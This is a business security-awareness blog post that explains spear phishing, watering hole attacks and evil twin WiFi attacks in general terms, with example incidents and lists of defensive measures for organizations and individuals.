What is spear phishing, watering holes, and evil twin attacks?

Spear phishing, watering holes, and evil twin attacks are technically cybersecurity threats staged by attackers trying to breach you and your employees, customers, and vendors’ personal and financial information. These tactics have evolved a long way over the past two decades and rely largely on social engineering – meaning they’re pretty difficult to detect, even for seasoned tech users. Effective business information security requires organizations have more than just tech savvy employees – it necessitates built-in defense systems that can parse out online phishing, scams, or data breaches.

Protecting against these cyberattacks is easier said than done, especially for financial organizations that are in frequent communication with third-party vendors and frequently exchanging payments and account credentials. What spear phishing, watering holes, and evil twin attacks all have in common is the way attackers try to mimic credible people, organizations, or wireless networks to glean or intercept personal information, which presents particular challenges for those working in the financial sector. Luckily, there are definitive defense strategies that can be built into day-to-day security that can largely mitigate the risk of these cyberattacks.

Spear Phishing

The most successful cyberattack method on this list is spear phishing, named for its precise, targeted attacks. Spear phishing differs from phishing in how personalized it is; while phishing usually targets large groups of victims all at once, spear phishing is much more curated. Attackers often pretend to be close friends, colleagues, or family members of victims, going to great lengths to gain personal information on those they are disguised as to seem credible to victims. After making contact with a victim, attackers will try to gain account credentials or financial information, and sometimes they will use their contact point to infect a user’s system with malware.

Part of what makes spear phishing so successful at organizations is how difficult it is for spam filtration to detect. Since they often seem like they are from real people or credible organizations, they often find their way into their intended recipients’ inboxes. Because so much personal information is listed on social media, networking sites like LinkedIn, and company websites, attackers often have a wealth of information at their fingerprints to better hone their spear phishing campaigns. High-level executives are often impersonated in what are called whale phishing attacks, which are targeted at lower-level employees who are more inclined to provide whatever information execs are asking for.

The popular retailer Target was impacted by this kind of cyberattack when log-in credentials were stolen from one of their vendors. Another example of a spear phishing attack was when a European manufacturer Leoni AG lost $4 million after the finance department was tricked into transferring money to the wrong account.

Defense strategies:

To prevent successful spear phishing campaigns at your organizations, there are several effective things you can do beyond the usual spam filters, antivirus software, and malware detection software, like:

  • Spear phishing simulation tests
  • User education that teaches email and message recipients to screen for strange wording or lingo usage and slightly inaccurate email addresses
  • Processes for employees to report suspicious emails
  • Tagging emails from outside the organization with “external”
  • Data protection programs or data loss prevention software
  • Have employees or users update software right away, as updates frequently have security software updates

Individuals can mitigate the risk of spear phishing campaigns with:

  • Creating smart/varied passwords
  • Limiting posting personal information on the Internet
  • Going directly to websites instead of clicking links in emails
  • Not providing anyone with usernames or passwords, regardless of the circumstances they request them using

It’s more difficult for those working in the financial sector to avoid clicking on external links or to constantly monitor email addresses sending incoming mail because they are constantly working with so many vendors and taking so many payments. To help mitigate this, they need more structured, automated security solutions.

Watering Hole Attacks

Next up are watering hole attacks, which are named after real-life animal watering holes where predators attack groups of prey when they are most vulnerable. Victims of this cyberattack usually belong to particular organizations, meaning that attackers are casting a wider net with this strategy than they are with spear phishing. After finding out which websites this group frequents, attackers infect those sites with malware. Once one or more individuals has been impacted by the malware, attackers are able to gain access to the whole organization’s network.

Many companies and groups have been the victims of watering hole attack, like Facebook, banks, defense organizations, and activist groups. In 2017, attackers staged a country-level attack in China, while other attackers compromised a Ukrainian government website with malware that deleted content of the victims’ hard drives.

Defense strategies:

To protect against watering hole attacks, companies can:

  • Apply new software patches to remove site vulnerabilities
  • Make sure security solutions prohibit you and your team from being able to access infected websites
  • Get extra layers of threat protection such as behavioral analysis
  • Use web gateway solutions to test exposure to compromised sites

Evil Twin Attacks

Last but (unfortunately) not least are evil twin attacks, named for the way attackers clone public access WiFi points and then “eavesdrop” on a user’s activity, information, and credentials. Technically, attackers are cloning the network’s name and information, making themselves undetectable to both the user and the device. This means that a public WiFi hotspot like one you might find at a coffee shop or conference may not actually come from those locations – it just seems that way.

Once the attacker is monitoring the user’s activity, they’re able to inject malware into their operating system, which is especially dangerous for employees who are trying to access their company’s sites – once the attacker has the log-in information, they’re able to keep and reuse them. Even if an attacker can’t initially trick a user, they’re able to interrupt the connection between the user and the legitimate hotspot, forcing the user to reconnect to the “evil twin.”

Many perpetrators have successful used evil twin attacks. One example is a Russian military agency that used an evil twin attack to plant malware on sites for nuclear power operations organizations, chemical testing laboratories, and more. Because they offered real 4G LTE internet connection, they were able to bypass security.

Defense strategies:

With evil twin attack prevention, there are several fairly straightforward strategies:

  • WiFi Intrusion Prevention Systems, which are designed to detect these duplicate access points
  • Personal Security Keys for employees and customers
  • Virtual Private Networks (VPNs), which encapsulate traffic when using public WiFi
  • Avoiding free public WiFi altogether

Click here to read the original blog post on the Gate 39 Media website.